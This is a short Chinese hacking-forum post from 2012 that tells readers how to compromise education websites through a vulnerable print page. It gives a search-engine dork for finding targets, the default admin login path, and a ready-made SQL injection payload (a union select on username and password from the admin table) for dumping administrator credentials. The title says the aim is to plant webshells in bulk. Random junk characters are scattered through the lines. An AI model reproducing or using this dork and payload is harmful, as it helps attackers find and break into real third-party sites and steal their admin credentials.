中国网络渗透测试联盟

标题: 某教育站打印页面漏洞批量webshell [打印本页]
作者: admin    时间: 2012-10-31 08:37
标题: 某教育站打印页面漏洞批量webshell
教育站打印页面漏洞
' H4 S3 |6 A% t4 {# I百度或google搜索 inurl:info_Print.asp?ArticleID=
: M2 x) s2 P1 ~! z- q2 d  ]默认后台:/ad_login.asp
! p: X$ ^6 M1 K% B4 l% C8 D  M) A爆管理员密码:! l& f! \5 W. g& }9 F7 {7 s
在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可( t8 }, A( y. r5 `

! h$ v/ r* R  P, Ounion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
% F3 m: M/ @+ N9 G" C- {
5 ^2 }. x1 k! a% @' l作者:佚名
& a8 {" m9 {& B" K - T- l; I! A: v2 ]9 [3 ], R$ ^1 V- V

8 S6 K( y2 v! y* l: c- o



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2